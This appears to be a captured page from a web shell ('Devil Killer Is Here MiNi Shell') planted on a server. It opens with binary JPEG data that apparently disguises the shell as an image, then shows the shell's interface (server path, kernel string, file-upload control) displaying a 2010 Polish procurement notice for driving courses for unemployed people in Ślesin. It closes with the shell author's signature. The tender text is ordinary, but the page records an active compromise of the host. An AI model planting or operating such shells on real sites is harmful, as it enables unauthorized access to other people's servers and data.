JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100924/262941-N-2010.html

<p class="kh_header"><b>Ślesin: PRZEPROWADZENIE SZKOLEŃ I WARSZTATÓW W RAMACH PROJEKTU SYSTEMOWEGO WSPÓŁFINANSOWANEGO PRZEZ UNIĘ EUROPEJSKĄ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO POKL, PRIORYTET VII PROMOCJA INTEGRACJI SPOŁECZNEJ, DZIAŁANIE 7.1 ROZWÓJ  I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJ, PODDZIAŁANIA 7.1.1 ROZWÓJ  I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI PRZEZ MIEJSKO-GMINNY OŚRODEK POMOCY SPOŁECZNEJ W ŚLESINIE, W RAMACH PROJEKTU /KLUCZ DO SUKCESU/ W ZAKRESIE KURSU PRAWA JAZDY KAT. B I C.</b><br>
<b>Numer ogłoszenia: 262941 - 2010; data zamieszczenia: 24.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Kleczewska 15, 62-561 Ślesin, woj. wielkopolskie, tel. 63 2704087, faks 63 2704196.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: GMINNA SAMORZĄDOWA JEDNOSTKA ORGANIZACYJNA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE SZKOLEŃ I WARSZTATÓW W RAMACH PROJEKTU SYSTEMOWEGO WSPÓŁFINANSOWANEGO PRZEZ UNIĘ EUROPEJSKĄ W RAMACH EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO POKL, PRIORYTET VII PROMOCJA INTEGRACJI SPOŁECZNEJ, DZIAŁANIE 7.1 ROZWÓJ  I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJ, PODDZIAŁANIA 7.1.1 ROZWÓJ  I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI PRZEZ MIEJSKO-GMINNY OŚRODEK POMOCY SPOŁECZNEJ W ŚLESINIE, W RAMACH PROJEKTU /KLUCZ DO SUKCESU/ W ZAKRESIE KURSU PRAWA JAZDY KAT. B I C..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu prawa jazdy kategorii B i C dla osób bezrobotnych i poszukujących pracę.
2. Na szkolenie skierowani będą podopieczni M-GOPS w Ślesinie, w ramach projektu systemowego współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego POKL, priorytet VII Promocja integracji społecznej, działanie 7.1 Rozwój  i upowszechnianie aktywnej integracji, poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez Miejsko-Gminny Ośrodek Pomocy Społecznej w Ślesinie w ramach projektu /Klucz do sukcesu/. 

3.  Szkolenie powinno obejmować następujący zakres tematyczny: 
      Kurs prawa jazdy kat B:
Liczba uczestników- 11 osób,
Czas trwania kursu -  do  10 grudnia 2010 r
Przewidywana liczba godzin: 60 godzin / osobę, w tym: 
1)  zajęcia teoretyczne - 30 godzin (Zamawiający przez /godzinę/ rozumie godzinę lekcyjną trwającą 45 min.);
2)  zajęcia praktyczne - 30 godzin  (Zamawiający przez /godzinę/ rozumie godzinę zegarową trwającą 60 min.);
      Kurs prawa jazdy kat C:
Liczba uczestników- 4 osoby,
Czas trwania kursu -  do  10 grudnia 2010 r
Przewidywana liczba godzin: 50 godzin / osobę, w tym: 
1)  zajęcia teoretyczne - 20 godzin (Zamawiający przez /godzinę/ rozumie godzinę lekcyjną trwającą 45 min.) ;
2)  zajęcia praktyczne - 30 godzin  (Zamawiający przez /godzinę/ rozumie godzinę zegarową trwającą 60 min.);
4.    Cel szkolenia:

1)  Cel szkolenia: teoretyczne i praktyczne przygotowanie uczestników do przystąpienia do egzaminu państwowego na uzyskanie uprawnień w zakresie prawa jazdy kat. B i C
2) Szkolenie ma zakończyć się egzaminem wewnętrznym ( egzamin w ostatnim dniu odbywania się zajęć edukacyjnych). 
2)  Program szkolenia ma być zgodny z przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia , egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów ( Dz. U. z 2005r. Nr 217 poz. 1834 z późn. zmianami) . 

5.  Miejsce szkolenia:
	
Zajęcia teoretyczne powinny odbywać się na terenie miasta Konina. Zajęcia praktyczne powinny się odbywać na terenie miasta Konina i okolic oraz tak, aby każdy uczestnik mógł odbywać jazdy                         w miejscu, w którym będzie zdawał egzamin.

Pozostałe wymagania:
1.  Uczestnicy szkolenia zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem szkolenia otrzyma wykaz osób skierowanych na szkolenie. W przypadku nie podjęcia przez wskazaną osobę szkolenia lub przerwanie w trakcie trwania kursu Wykonawca niezwłocznie ma obowiązek zawiadomić  o tym fakcie Zamawiającego, a Zamawiający ma prawo skierować na to miejsce inną osobę.
2.  Przed rozpoczęciem zajęć każdej grupy osób lub osoby, Wykonawca zobowiązany jest zorganizować               i skierować uczestników szkolenia na badania lekarskie, potwierdzające brak przeciwwskazań zdrowotnych do kierowania pojazdami.
3. Zajęcia powinny być prowadzone przez imiennie wskazanych Wykładowców i instruktorów                              o odpowiednich kwalifikacjach i doświadczeniu, spełniających wymogi przewidziane w przepisach Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów                 ( Dz. U. z 2005r. Nr 217 poz. 1834 z późn. zmianami). 
4.  Szkolenie powinno odbywać się w formie kursu realizowanego według planu nauczania zgodnego                  z zapisami zawartymi w Rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia , egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów                          i egzaminatorów ( Dz. U. z 2005r. Nr 217 poz. 1834 z późn. zmianami) . 
5.  Zajęcia mogą odbywać się w grupach, z tym że liczba osób w grupie powinna być dostosowana do warunków lokalowych oraz sprzętowych, aby umożliwić uczestnikom kursu korzystanie z przekazywanej wiedzy teoretycznej i praktycznej w dostatecznym zakresie. 
6.  Zajęcia szkoleniowe Wykonawca będzie prowadził z wyłączeniem niedziel i świąt, w przedziale czasowym od 6:00 do 22:00. Powyższe ograniczenie nie dotyczy 2 godzin obowiązkowej jazdy w ruchu drogowym w okresie od zmierzchu do świtu, dla każdego z uczestników szkolenia.
7.  Wykonawca, przedstawi Harmonogram szkolenia danej grupy osób (osoby) zawierający m. in. nazwę szkolenia, miejsce prowadzenia teoretycznych zajęć szkoleniowych, zakres wykładów (z podaniem terminów, godzin zajęć szkoleniowych dla poszczególnych wykładów oraz dane wykładowcy/ów). Harmonogramy będą sporządzone zgodnie ze wzorem stanowiącym załącznik  Nr 5 do SIWZ.
8. Teoretyczne zajęcia szkoleniowe muszą odbywać się w Koninie. Praktyczne zajęcia szkoleniowe mogą odbywać się poza terenem Miasta Konina, z tym zastrzeżeniem, że dany uczestnik szkolenia rozpoczyna                     i kończy każde zajęcia szkoleniowe w Koninie lub w Ślesinie. 
9. Teoretyczne zajęcia szkoleniowe muszą odbywać się w pomieszczeniu(-ach) dostosowanym(-ych) do prowadzenia zajęć szkoleniowych i odpowiednio w tym celu wyposażonym(-ych), tj. w pomieszczeniach z zapewnionym zapleczem, posiadających odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne                 i jakościowe.
10. Wykonawca zobowiązany jest zapewnić warunki szkolenia zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia.
11.  Do realizacji zadania na czas trwania szkolenia Wykonawca musi zapewnić:
       a) wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne). Materiały szkoleniowe typu podręczniki, skrypty zeszyty lub inne  muszą być adekwatne do treści szkolenia i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie                z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów lub ich kserokopię Wykonawca jest zobowiązany przekazać Zamawiającemu.
     b)  obowiązkowe ubezpieczenie NNW,
     c)  odpowiednią ilość sprzętu umożliwiającą swobodne uczestnictwo każdego kursanta.
12. Zakończeniem szkolenia będzie przeprowadzenie, na zasadach opisanych w Rozporządzeniu, egzaminu wewnętrznego potwierdzającego zdobytą wiedzę, a następnie wydanie zaświadczeń                                  o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. B i C, oraz przedłożenie ich kopii Zamawiającemu (potwierdzonych za zgodność z oryginałem). Ponadto Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu państwowego przez każdego uczestnika, który ukończy przedmiotowe szkolenie.
13.  Uczestnikom szkolenia, każdego dnia, w czasie trwania przerw należy zapewnić catering, w postaci: kawa, herbata, cukier, mleko/śmietanka oraz ciasteczka deserowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1, 80.41.12.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca będzie posiadał:
a)  Aktualne zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji Wojewódzki Urząd Pracy.  
b)  Zaświadczenie o wpisie do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców w zakresie kat. B i C.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnieniu warunków w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnieniu warunków w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca będzie dysponować osobami 
o których mowa jest w Załączniku Nr 3 do SIWZ, które posiadają uprawnienia do wykonania usługi objętej przedmiotem  zamówienia. 
Zamawiający będzie oceniać posiadane wykształcenie, kwalifikacje i liczbę przeprowadzonych szkoleń w zakresie zagadnień będących przedmiotem zamówienia, na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności metodą warunku granicznego - spełnia/ nie spełnia.
Osoby, zarówno wykładowcy jak instruktorzy, wskazane do przeprowadzenia szkolenia muszą posiadać:
- kwalifikacje  spełniające wymogi przewidziane w przepisach Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia , egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów ( Dz. U. z 2005r. Nr 217 poz. 1834 z późn. zmianami), tj.: ważną legitymację instruktora, wydaną przez starostę właściwego ze względu na miejsce zamieszkania. 
- doświadczenie w prowadzeniu co najmniej 2 szkoleń o tematyce zgodnej z przedmiotem zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert.
 W wykazie należy wpisać tylko osoby spełniające podane warunki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnieniu warunków w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy,
 2. Harmonogram szkolenia,
 3. Pełnomocnictwo-/jeżeli dotyczy/,
 4. Wykaz usług powierzonych podwykonawcom, 
5. Projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany składu kadry dydaktycznej, po uprzednim uzgodnieniu w formie pisemnej 
z Wykonawcą , przy czym zmiana wykładowcy wymaga równorzędnego zastępstwa,
2. Zmiany w terminie realizacji przedmiotu umowy, po uprzednim uzgodnieniu w formie pisemnej z Wykonawcą,
3. Wystąpienia siły wyższej lub innych okoliczności niezależnych od Wykonawcy lub których Wykonawca przy należytej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonywaniu usługi spowodowane przez osoby trzecie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.slesin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Ślesinie ul. Kleczewska 15 /budynek obok UMiG w Ślesinie/, 62-561 Ślesin..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2010 godzina 10:00, miejsce: Miejsko-Gminny Ośrodek Pomocy Społecznej w Ślesinie ul. Kleczewska 15 /budynek obok UMiG w Ślesinie/, 62-561 Ślesin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie przewiduje zawarcia umowy ramowej. 
2. Szkolenie współfinansowane będzie w ramach projektu KLUCZ DO SUKCESU współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII /Działanie 7.1./ Poddziałanie 7.1.2...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com